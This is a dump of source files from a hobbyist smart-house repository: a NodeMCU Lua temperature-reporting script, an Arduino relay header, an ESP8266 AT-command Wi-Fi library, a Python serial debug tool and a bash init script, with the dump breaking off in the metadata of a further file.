"text": "--init.lua\n\ndevide_id = \"05\"\nds18b20_pin = 3 -- GPIO0\npin = 4 -- GPIO1\now.setup(ds18b20_pin) -- init one wire\nwifi_ssid = \"michael\"\nwifi_passwd = \"waterpigs\"\nconfig_server_port = 5683\ndata_server_ip = \"192.168.31.185\"\ndata_server_port = 9999\ndata_report_timer = 60000 -- 60 seconds\n\n-- Bit xor operation\n--- TODO: is this not built in??\nfunction bxor(a,b)\n local r = 0\n for i = 0, 31 do\n if ( a % 2 + b % 2 == 1 ) then\n r = r + 2^i\n end\n a = a / 2\n b = b / 2\n end\n return r\nend\n\n-- Get temperature from DS18B20\n--- return: integer, unit is 1/10000 degree celcius; a value over 100 C should be treated as invalid\nfunction getTemp()\n local t = 101 * 10000 -- 101 degree Celcius, the invalid temperature\n addr = ow.reset_search(ds18b20_pin)\n repeat\n tmr.wdclr() -- clear system watchdog counter to avoid hardware reset caused by watchdog\n if (addr ~= nil) then\n crc = ow.crc8(string.sub(addr,1,7))\n if (crc == addr:byte(8)) then\n if ((addr:byte(1) == 0x10) or (addr:byte(1) == 0x28)) then\n ow.reset(ds18b20_pin)\n ow.select(ds18b20_pin, addr)\n ow.write(ds18b20_pin, 0x44, 1)\n tmr.delay(1000000)\n present = ow.reset(ds18b20_pin)\n ow.select(ds18b20_pin, addr)\n ow.write(ds18b20_pin,0xBE, 1)\n data = nil\n data = string.char(ow.read(ds18b20_pin))\n for i = 1, 8 do\n data = data .. string.char(ow.read(ds18b20_pin))\n end\n crc = ow.crc8(string.sub(data,1,8))\n if (crc == data:byte(9)) then\n t = (data:byte(1) + data:byte(2) * 256)\n if (t > 32768) then\n t = (bxor(t, 0xffff)) + 1\n t = (-1) * t\n end\n t = t * 625\n -- print(\"Last temp: \" .. t)\n end\n end\n end\n end\n addr = ow.search(ds18b20_pin)\n until(addr == nil)\n return t\nend\n\nwifi.setmode(wifi.STATION)\nwifi.sta.config(wifi_ssid, wifi_passwd)\nwifi.sta.connect()\n\ntmr.alarm(1, 1000, 1, function()\n if wifi.sta.getip()== nil then\n print(\"IP unavaiable, Waiting...\")\n else\n tmr.stop(1)\n print(\"Config done, IP is \"..wifi.sta.getip())\n print(\"start UDP server on port \"..config_server_port)\n s=net.createServer(net.UDP)\n s:on(\"receive\",function(s,c)\n --print(c)\n if c == \"high\" then\n print(\"turning GPIO2 high\")\n gpio.write(pin, gpio.HIGH)\n else\n print(\"turning GPIO2 low\")\n gpio.write(pin, gpio.LOW)\n end\n end)\n s:listen(config_server_port)\n client = net.createConnection(net.UDP, 0)\n client:connect(data_server_port, data_server_ip)\n tmr.alarm(2, data_report_timer, 1, function()\n cur_temp = getTemp()\n t1 = cur_temp / 10000\n t2 = (cur_temp >= 0 and cur_temp % 10000) or (10000 - cur_temp % 10000)\n print(\"Temp:\"..t1..\".\"..string.format(\"%04d\", t2)..\" C\\n\")\n client:send(\"REPORT;\"..devide_id..\";Temperature;\"..cur_temp)\n end)\n end\nend)\n"
},
{
"alpha_fraction": 0.5926412343978882,
"alphanum_fraction": 0.6136662364006042,
"avg_line_length": 16.697673797607422,
"blob_id": "926078d9dd5905e047d4d9ba8453e8dee304c7f0",
"content_id": "0aa2ed11d707aff49b28c6016cd9e94968736d82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 761,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 43,
"path": "/ArduinoController/Relay.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n/**\n * @file Relay.h\n *\n * Class providing handling of one relay\n VCC -> 5V\n GND -> GND\n IN -> PIN_x\n */\n\n#ifndef __RELAY_H__\n#define __RELAY_H__\n\n#include <Arduino.h>\n\nclass Relay\n{\nprivate:\n uint8_t _on_lvl;\n uint8_t _cur_lvl;\n uint8_t _pin;\n\npublic:\n\n Relay(uint8_t __pin, uint8_t __on_lvl);\n\n void begin(uint8_t default_lvl);\n void on(void);\n void off(void);\n uint8_t cur_lvl(void);\n void on_lvl(uint8_t __on_lvl);\n uint8_t on_lvl(void);\n uint8_t pin(void);\n};\n\n#endif // __RELAY_H__\n"
},
{
"alpha_fraction": 0.43455132842063904,
"alphanum_fraction": 0.4449445605278015,
"avg_line_length": 24.888771057128906,
"blob_id": "34499416ff95a1f560e32d7ff22b7b16cd359531",
"content_id": "2705a3806ba326ea8253fa06da5eebc6251bb139",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 24439,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 944,
"path": "/ArduinoController/uartWIFI.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nDONE: Find a good way to wait for ESP8266_TIMEOUT. In current solution, if we are unlucky and there is a wrap-around of timer, the we could\n wait forever.\n Answer: this is not a problem, since when overflow happens, the subtraction result will be a really big number (thanks to unsigned)\nTODO: Find if head and tail pattern are universal, so we could handle them at one place.\n*/\n\n#include \"uartWIFI.h\"\n\n#ifdef ESP8266_DEBUG\n #define DBGR(message) Serial.print(message)\n #define DBG(message) Serial.println(message) // debug output with newline\n #define DBGW(message) Serial.write(message)\n#else\n #define DBGR(message)\n #define DBG(message)\n #define DBGW(message)\n#endif\n\n#ifdef ESP8266_DEBUG_2\n #define DBG2R(message) Serial.print(message)\n #define DBG2(message) Serial.println(message)\n#else\n #define DBG2R(message)\n #define DBG2(message)\n#endif\n\n#ifdef UNO\n #ifdef ESP8266_DEBUG\n SoftwareSerial softSerial(_DBG_RXPIN_, _DBG_TXPIN_);\n #endif\n#endif\n\nint chlID; //client id(0-4)\n\nvoid WIFI::begin(void)\n{\n #ifdef ESP8266_DEBUG\n DebugSerial.begin(debugBaudRate); //The default baud rate for debugging is 9600\n #endif\n DBG2(\"WIFI::begin() starts\");\n _newline = \"\\r\\n\";\n _cell.begin(ESP8266_BAUDRATE);\n _cell.flush();\n _cell.setTimeout(ESP8266_TIMEOUT);\n Reset(); // TODO: at other places, Reset results are not checked, is it a problem that Reset fails?\n DBG2(\"WIFI::begin() ends\");\n}\n\n\n/*************************************************************************\nInitialize port\n\n mode: setting operation mode\n STA: Station\n AP: Access Point\n AT_STA: Access Point & Station\n ssid: Wifi SSID (network name)\n pwd: Wifi password\n chl: channel number if AP or AP_STA\n ecn: encryption method if AP or AP_STA\n OPEN 0\n WEP 1\n WAP_PSK 2\n WAP2_PSK 3\n WAP_WAP2_PSK 4\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::Initialize(byte mode, String ssid, String pwd, byte chl, byte ecn)\n{\n DBG2R(\"WIFI::Initialize starts with \");\n DBG2R(\"mode=\");DBG2R(mode);DBG2R(\" SSID=\");DBG2R(ssid);DBG2R(\" pwd=\");DBG2R(pwd);DBG2R(\" chl=\");DBG2R(chl);DBG2R(\" ecn=\");DBG2(ecn);\n boolean result = false;\n if (mode == STA || mode == AP || mode == AP_STA) {\n result = confMode(mode);\n Reset();\n // TODO: if confMode fails, does it make sense to continue with confJAP and confSAP?\n switch (mode) {\n case STA:\n confJAP(ssid, pwd);\n break;\n case AP:\n confSAP(ssid, pwd, chl, ecn);\n break;\n case AP_STA:\n confJAP(ssid, pwd);\n confSAP(ssid, pwd, chl, ecn);\n break;\n default: break;\n }\n }\n return result;\n DBG2R(\"WIFI::Initialize ends with \");DBG2(result);\n}\n\n/*************************************************************************\nSet up TCP or UDP connection\n\n type: TCP or UDP\n\n addr: ip address\n\n port: port number\n\n useMultiConn: single / multiple connection\n false to use single connection\n true to use multiple connection\n\n id: id number(0-4)\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::ipConfig(byte type, String addr, int port, boolean useMultiConn, byte id)\n{\n DBG2R(\"WIFI::ipConfig starts with \");\n DBG2R(\"type=\");DBG2R(type);DBG2R(\" addr=\");DBG2R(addr);DBG2R(\" port=\");DBG2R(port);DBG2R(\" useMultiConn=\");DBG2R(useMultiConn);\n DBG2R(\" id=\");DBG2(id);\n boolean result = false;\n confMux(useMultiConn);\n 
delay(ESP8266_TIMEOUT); // TODO: is this necessary?\n    if (!useMultiConn) { // use single connection mode\n        result = newMux(type, addr, port);\n    } else {\n        result = newMux(id, type, addr, port);\n    }\n    DBG2R(\"WIFI::ipConfig ends with \");DBG2(result);\n    return result;\n}\n\n/*************************************************************************\nReceive message from wifi\n\n    buf: buffer for receiving data\n\n    chlID: <id>(0-4)\n\n    return: size of the buffer\n\nTODO: this method should take parameter like (unsigned char* buf, unsigned int max_length) so we could check the received data length does\n    not exceed the buffer length.\nTODO: define a new struct as return type, which consists of iSize and chlID (which could be -1 to mark chlID doesn't exist).\n***************************************************************************/\nint WIFI::ReceiveMessage(char *buf)\n{\n    //+IPD,<len>:<data>\n    //+IPD,<id>,<len>:<data>\n    String data;\n    int iSize = 0;\n    unsigned long start = millis();\n\n    // read in all data, which ends with \"\\nOK\".\n    while (millis() - start < ESP8266_TIMEOUT * 2) {\n        while (_cell.available()) {\n            data += (char) _cell.read();\n        }\n        if (data.indexOf(\"\\nOK\") != -1) {\n            break;\n        }\n    }\n    DBGR(\"data=\");DBG(data);\n\n    // post processing\n    // it can be in form \"+IPD,len:data\" or \"+IPD,id,len:data\"\n    int head_start, head_end, id_start, len_start, data_start;\n    String id, len;\n    String head;\n    head_start = data.indexOf('+');\n    head_end = data.indexOf(':');\n    if (head_start == -1 || head_end == -1 || head_start >= head_end) {\n        DBG(\"No head\");\n        return 0;\n    }\n    head = data.substring(head_start, head_end); // gives either \"+IPD,len\" or \"+IPD,id,len\"\n    id_start = head.indexOf(',') + 1;\n    len_start = head.lastIndexOf(',') + 1;\n    if (id_start == -1 || len_start == -1) {\n        DBG(\"No id or len\");\n        return 0;\n    } else if (id_start != len_start) {\n        // it's \"+IPD,id,len\"\n        id = head.substring(id_start, len_start-1);\n        DBG(id);\n        chlID = id.toInt();\n    }\n    len = head.substring(len_start);\n    iSize = len.toInt();\n    data = data.substring(head_end+1);\n    if (iSize > data.length()) {\n        DBG(\"Not fully received\");\n        return 0;\n    }\n    // copy received bytes into given buffer\n    data.toCharArray(buf, iSize);\n    return iSize;\n}\n\n//////////////////////////////////////////////////////////////////////////\n\n\n/*************************************************************************\nReboot the wifi module\n\n\n\n***************************************************************************/\nboolean WIFI::Reset(void)\n{\n    DBG(\"WIFI::Reset starts\");\n    boolean result = false;\n    unsigned long start;\n    _cell.println(\"AT+RST\");\n    DBG(\"AT+RST\");\n    start = millis();\n    while (millis()-start < ESP8266_TIMEOUT) {\n        if (_cell.find(\"ready\")) {\n            result = true;\n            break;\n        }\n    }\n    DBG(\"WIFI::Reset ends with \");\n    DBG(result);\n    return result;\n}\n\n/*********************************************\n *********************************************\n *********************************************\n            WIFI Function Commands\n *********************************************\n *********************************************\n *********************************************\n */\n\n/*************************************************************************\nInquire the current mode of wifi module\n\n    return: string of current mode\n        Station\n        AP\n        AP+Station\n\n***************************************************************************/\nString WIFI::showMode()\n{\n    String data;\n    String result = \"Unknown\";\n    
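// ask the module for its current mode; the reply is parsed below\n    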
_cell.println(\"AT+CWMODE?\");\n DBG(\"AT+CWMODE?\");\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1) {\n break;\n }\n }\n DBG(data);\n if (data.indexOf(\"1\") != -1) {\n result = \"Station\";\n } else if (data.indexOf(\"2\") != -1) {\n result = \"AP\";\n } else if (data.indexOf(\"3\") != -1) {\n result = \"AP+Station\";\n }\n DBG(result);\n return result;\n}\n\n\n\n/*************************************************************************\nConfigure the operation mode\n\n mode:\n 1 - Station\n 2 - AP\n 3 - AP+Station\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::confMode(byte mode)\n{\n DBG(\"WIFI::confMode starts\");\n String data;\n boolean result;\n String cmd = \"AT+CWMODE=\";\n cmd += mode;\n _cell.println(cmd);\n DBG(cmd);\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if (_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"no change\") != -1) {\n DBG(\"OK or no change\");\n result = true;\n break;\n }\n if (data.indexOf(\"ERROR\") != -1 || data.indexOf(\"busy\") != -1) {\n DBG(\"ERROR or busy\");\n break;\n }\n }\n DBG(data);\n DBG(\"WIFI::confMode ends\");\n DBG(result);\n return result;\n}\n\n\n/*************************************************************************\nShow the list of wifi hotspot\n\n return: string of wifi information\n encryption,SSID,RSSI\n\n\n***************************************************************************/\nString WIFI::showAP(void)\n{\n String data;\n _cell.flush();\n _cell.print(\"AT+CWLAP\\r\\n\");\n DBG(\"AT+CWLAP\\r\\n\");\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"ERROR\") != -1 ) {\n break;\n }\n }\n DBG(data);\n if(data.indexOf(\"ERROR\") != -1) {\n return \"ERROR\";\n } else {\n data.replace(\"AT+CWLAP\",\"\");\n data.replace(\"OK\",\"\");\n data.replace(\"+CWLAP\",\"WIFI\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n }\n }\n\n\n/*************************************************************************\nShow the name of current wifi access port\n\n return: string of access port name\n AP: <SSID>\n\n***************************************************************************/\nString WIFI::showJAP(void)\n{\n _cell.flush();\n _cell.println(\"AT+CWJAP?\");\n DBG(\"AT+CWJAP?\");\n String data;\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"ERROR\") != -1 ) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CWJAP?\",\"\");\n data.replace(\"+CWJAP\",\"AP\");\n data.replace(\"OK\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n}\n\n\n/*************************************************************************\nConfigure the SSID and password of the access port\n\n return:\n true - successfully\n false - unsuccessfully\n\n\n***************************************************************************/\nboolean WIFI::confJAP(String ssid, String pwd)\n{\n DBG(\"WIFI::confJAP starts\");\n boolean result = false;\n String 
cmd = \"AT+CWJAP=\\\"\";\n cmd += ssid;\n cmd += \"\\\",\\\"\";\n cmd += pwd;\n cmd += \"\\\"\";\n _cell.println(cmd);\n DBG(cmd);\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.find(\"OK\")) {\n result = true;\n break;\n }\n }\n DBG(\"WIFI::confJAP ends\");\n DBG(result);\n return result;\n}\n/*************************************************************************\nQuite the access port\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::quitAP(void)\n{\n _cell.println(\"AT+CWQAP\");\n DBG(\"AT+CWQAP\");\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.find(\"OK\")) {\n return true;\n }\n }\n return false;\n}\n\n/*************************************************************************\nShow the parameter of SSID, password, channel, encryption in AP mode\n\n return:\n mySAP:<SSID>,<password>,<channel>,<encryption>\n\n***************************************************************************/\nString WIFI::showSAP()\n{\n _cell.println(\"AT+CWSAP?\");\n DBG(\"AT+CWSAP?\");\n String data;\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"ERROR\") != -1 ) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CWSAP?\",\"\");\n data.replace(\"+CWSAP\",\"mySAP\");\n data.replace(\"OK\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n}\n\n/*************************************************************************\nConfigure the parameter of SSID, password, channel, encryption in AP mode\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\n\nboolean WIFI::confSAP(String ssid , String pwd , byte chl , byte ecn)\n{\n boolean result = false;\n unsigned long start;\n String cmd = \"AT+CWSAP=\\\"\";\n cmd += ssid;\n cmd += \"\\\",\\\"\";\n cmd += pwd;\n cmd += \"\\\",\";\n cmd += chl;\n cmd += \",\";\n cmd += ecn;\n _cell.println(cmd);\n DBG(cmd);\n start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if (_cell.find(\"OK\")) {\n result = true;\n break;\n }\n }\n return result;\n}\n\n\n/*********************************************\n *********************************************\n *********************************************\n TPC/IP Function Command\n *********************************************\n *********************************************\n *********************************************\n */\n\n/*************************************************************************\nInquire connection status\n\n return: string of connection status\n <ID> 0-4\n <type> TCP or UDP\n <addr> IP\n <port> port number\n\n***************************************************************************/\n\nString WIFI::showStatus(void)\n{\n _cell.println(\"AT+CIPSTATUS\");\n DBG(\"AT+CIPSTATUS\");\n String data;\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CIPSTATUS\",\"\");\n data.replace(\"OK\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return 
data;\n}\n\n/*************************************************************************\nShow the current connection mode (single or multiple)\n\n return: string of connection mode\n 0 - single\n 1 - multiple\n\n***************************************************************************/\nString WIFI::showMux(void)\n{\n String data;\n _cell.println(\"AT+CIPMUX?\");\n DBG(\"AT+CIPMUX?\");\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CIPMUX?\",\"\");\n data.replace(\"+CIPMUX\",\"showMux\");\n data.replace(\"OK\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n}\n\n/*************************************************************************\nConfigure connection mode (single or multiple)\n\n useMultiConn: if multiple connection mode should be used\n false - use single connection mode\n true - use multiple connection mode\n\n return:\n true - successfully\n false - unsuccessfully\n***************************************************************************/\nboolean WIFI::confMux(boolean useMultiConn)\n{\n String cmd = \"AT+CIPMUX=\";\n cmd += useMultiConn;\n _cell.println(cmd);\n DBG(cmd);\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if (_cell.find(\"OK\")) {\n return true;\n }\n }\n return false;\n}\n\n\n/*************************************************************************\nSet up TCP or UDP connection for single connection mode.\n\n type: TCP or UDP\n\n addr: IP address\n\n port: port number\n\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::newMux(byte type, String addr, int port)\n{\n String data;\n _cell.print(\"AT+CIPSTART=\");\n if(type>0)\n {\n _cell.print(\"\\\"TCP\\\"\");\n }else\n {\n _cell.print(\"\\\"UDP\\\"\");\n }\n _cell.print(\",\");\n _cell.print(\"\\\"\");\n _cell.print(addr);\n _cell.print(\"\\\"\");\n _cell.print(\",\");\n// _cell.print(\"\\\"\");\n _cell.println(String(port));\n// _cell.println(\"\\\"\");\n unsigned long start;\n start = millis();\n while (millis()-start<ESP8266_TIMEOUT) {\n if(_cell.available()>0)\n {\n char a = (char) _cell.read();\n data=data+a;\n }\n if (data.indexOf(\"OK\")!=-1 || data.indexOf(\"ALREAY CONNECT\")!=-1 || data.indexOf(\"ERROR\")!=-1)\n {\n return true;\n }\n }\n return false;\n}\n/*************************************************************************\nSet up TCP or UDP connection (multiple connection mode)\n\n type: TCP or UDP\n\n addr: IP address\n\n port: port number\n\n id: id number(0-4)\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::newMux(byte id, byte type, String addr, int port)\n{\n\n _cell.print(\"AT+CIPSTART=\");\n _cell.print(\"\\\"\");\n _cell.print(String(id));\n _cell.print(\"\\\"\");\n if(type>0)\n {\n _cell.print(\"\\\"TCP\\\"\");\n }\n else\n {\n _cell.print(\"\\\"UDP\\\"\");\n }\n _cell.print(\",\");\n _cell.print(\"\\\"\");\n _cell.print(addr);\n _cell.print(\"\\\"\");\n _cell.print(\",\");\n// _cell.print(\"\\\"\");\n _cell.println(String(port));\n// _cell.println(\"\\\"\");\n String data;\n unsigned long start;\n start = millis();\n while (millis()-start<ESP8266_TIMEOUT) {\n if(_cell.available()>0)\n {\n char a = (char) 
_cell.read();\n      data=data+a;\n    }\n    if (data.indexOf(\"OK\")!=-1 || data.indexOf(\"ALREAY CONNECT\")!=-1 )\n    {\n      return true;\n    }\n  }\n  return false;\n\n\n}\n/*************************************************************************\nSend data in single connection mode\n\n    str: string of message\n\n    return:\n        true - successfully\n        false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::Send(String str)\n{\n    _cell.print(\"AT+CIPSEND=\");\n//    _cell.print(\"\\\"\");\n    _cell.println(str.length());\n//    _cell.println(\"\\\"\");\n    unsigned long start;\n    start = millis();\n    bool found = false;\n    while (millis()-start<5000) {\n        if(_cell.find(\">\")==true )\n        {\n            found = true;\n            break;\n        }\n    }\n    if(found)\n        _cell.print(str);\n    else\n    {\n        closeMux();\n        return false;\n    }\n\n\n    String data;\n    start = millis();\n    while (millis()-start<5000) {\n        if(_cell.available()>0)\n        {\n            char a = (char) _cell.read();\n            data=data+a;\n        }\n        if (data.indexOf(\"SEND OK\")!=-1)\n        {\n            return true;\n        }\n    }\n    return false;\n}\n\n/*************************************************************************\nSend data in multiple connection mode\n\n    id: <id>(0-4)\n\n    str: string of message\n\n    return:\n        true - successfully\n        false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::Send(byte id, String str)\n{\n    _cell.print(\"AT+CIPSEND=\");\n\n    _cell.print(String(id));\n    _cell.print(\",\");\n    _cell.println(str.length());\n    unsigned long start;\n    start = millis();\n    bool found = false;\n    while (millis()-start<5000) {\n        if(_cell.find(\">\")==true )\n        {\n            found = true;\n            break;\n        }\n    }\n    if(found)\n        _cell.print(str);\n    else\n    {\n        closeMux(id);\n        return false;\n    }\n\n\n    String data;\n    start = millis();\n    while (millis()-start<5000) {\n        if(_cell.available()>0)\n        {\n            char a = (char) _cell.read();\n            data=data+a;\n        }\n        if (data.indexOf(\"SEND OK\")!=-1)\n        {\n            return true;\n        }\n    }\n    return false;\n}\n\n/*************************************************************************\nClose up TCP or UDP connection for single connection mode.\n***************************************************************************/\nvoid WIFI::closeMux(void)\n{\n    _cell.println(\"AT+CIPCLOSE\");\n\n    String data;\n    unsigned long start;\n    start = millis();\n    while (millis()-start<ESP8266_TIMEOUT) {\n        if(_cell.available()>0)\n        {\n            char a = (char) _cell.read();\n            data=data+a;\n        }\n        if (data.indexOf(\"Linked\")!=-1 || data.indexOf(\"ERROR\")!=-1 || data.indexOf(\"we must restart\")!=-1)\n        {\n            break;\n        }\n    }\n}\n\n\n/*************************************************************************\nClose up TCP or UDP connection for multiple connection mode.\n\n    id: connection ID number(0-4)\n***************************************************************************/\nvoid WIFI::closeMux(byte id)\n{\n    _cell.print(\"AT+CIPCLOSE=\");\n    _cell.println(String(id));\n    String data;\n    unsigned long start;\n    start = millis();\n    while (millis()-start<ESP8266_TIMEOUT) {\n        if(_cell.available()>0)\n        {\n            char a = (char) _cell.read();\n            data=data+a;\n        }\n        if (data.indexOf(\"OK\")!=-1 || data.indexOf(\"Link is not\")!=-1 || data.indexOf(\"Cant close\")!=-1)\n        {\n            break;\n        }\n    }\n\n}\n\n/*************************************************************************\nShow current IP address\n\n    return: IP address as a String\n\n***************************************************************************/\nString WIFI::showIP(void)\n{\n    String data;\n    unsigned long start;\n    
_cell.println(\"AT+CIFSR\");\n start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n while(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"AT+CIFSR\") != -1) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CIFSR\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n}\n\n/*************************************************************************\nSet server parameters\n\n mode:\n 0 - close server mode\n 1 - open server mode\n\n port: <port>\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::confServer(byte mode, int port)\n{\n String data;\n boolean result = false;\n String cmd = \"AT+CIPSERVER=\";\n cmd += mode;\n cmd += \",\";\n cmd += port;\n _cell.println(cmd);\n DBG(cmd);\n\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"no charge\") != -1) {\n result = true;\n break;\n }\n }\n return result;\n}\n"
},
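The Send() methods above encode the ESP8266 AT-command handshake: write AT+CIPSEND=<length>, wait up to five seconds for the ">" prompt, write the payload, then poll the response buffer for "SEND OK". A minimal host-side sketch of the same handshake in Python, assuming pyserial and a module on /dev/ttyUSB0 (port name, baud rate and timeouts are illustrative assumptions, not from the source):

    import serial
    import time

    def at_send(ser, payload, timeout=5.0):
        # announce the payload length, mirroring WIFI::Send()
        ser.write(("AT+CIPSEND=%d\r\n" % len(payload)).encode("ascii"))
        buf = b""
        deadline = time.time() + timeout
        while time.time() < deadline:      # wait for the '>' prompt
            buf += ser.read(ser.in_waiting or 1)
            if b">" in buf:
                break
        else:
            return False                   # no prompt; the library closes the link at this point
        ser.write(payload.encode("ascii"))
        buf = b""
        deadline = time.time() + timeout
        while time.time() < deadline:      # wait for the firmware's confirmation
            buf += ser.read(ser.in_waiting or 1)
            if b"SEND OK" in buf:
                return True
        return False

    # usage sketch: at_send(serial.Serial("/dev/ttyUSB0", 9600, timeout=0.1), "hello")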
{
"alpha_fraction": 0.5483871102333069,
"alphanum_fraction": 0.5483871102333069,
"avg_line_length": 31,
"blob_id": "86f273cd82e8dbeb7ff49b990e5987794cfd0593",
"content_id": "d23d75de2447718bf755887e197e3d3740704636",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 1,
"path": "/WifiCar/SerialProtocol/tests/__init__.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "__all__ = ['testProtocol.py', ]"
},
{
"alpha_fraction": 0.41237112879753113,
"alphanum_fraction": 0.43170103430747986,
"avg_line_length": 28.846153259277344,
"blob_id": "eff2dfab317cd4d81e26eebec8fc52602ec3a080",
"content_id": "6a230bf69339f0e2b82fb7cc4e0ba2b11ea0aa44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 776,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 26,
"path": "/WifiCar/debug.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport serial\nimport os\n\nif __name__ == '__main__':\n if 'windows' in ' '.join(os.uname()).lower():\n ser = serial.Serial(port=4, baudrate=19200)\n else:\n ser = serial.Serial('/dev/ttyUSB0', 19200)\n while True:\n x = input('--> ')\n ser.write(bytes(x.encode('ascii')))\n while True:\n line = ser.readline()\n decoded = False\n while not decoded:\n try:\n line = line.decode('ascii')\n decoded = True\n except UnicodeDecodeError:\n if len(line) > 0:\n line = line[1:]\n else:\n break\n if decoded:\n print('Nano: ', line)\n"
},
{
"alpha_fraction": 0.6041379570960999,
"alphanum_fraction": 0.6206896305084229,
"avg_line_length": 23.16666603088379,
"blob_id": "fdde926c1ab0769ecf546a77b114c284a301d173",
"content_id": "1ea9a15b520c277a50587e09e4ca59d53fe6c252",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 30,
"path": "/pysmarthouse_service",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n# /etc/init.d/pysmarthouse_service\n\n### BEGIN INIT INFO\n# Provides: pysmarthouse_service\n# Required-Start: $remote_fs $syslog\n# Required-Stop: $remote_fs $syslog\n# Default-Start: 2 3 4 5\n# Default-Stop: 0 1 6\n# Short-Description: Smart house control by Python 3\n# Description: This service is used to control house applications.\n### END INIT INFO\n\n\ncase \"$1\" in \n start)\n echo \"Starting pysmarthouse_service\"\n /home/pi/git/pysmarthouse/pysmarthouse.sh\n ;;\n stop)\n echo \"Stopping pysmarthouse_service\"\n killall python3\n ;;\n *)\n echo \"Usage: /etc/init.d/pysmarthouse_service start|stop\"\n exit 1\n ;;\nesac\n\nexit 0\n"
},
{
"alpha_fraction": 0.5722430348396301,
"alphanum_fraction": 0.577409565448761,
"avg_line_length": 46.168067932128906,
"blob_id": "04f06b110ced9b507a6ee7c0fbcd0dac3e21e43f",
"content_id": "1a18432f4ab23eafc9e856e8b72bd145b14509de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5613,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 119,
"path": "/GpioOnSunSchedule/GpioOnSunSchedule.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
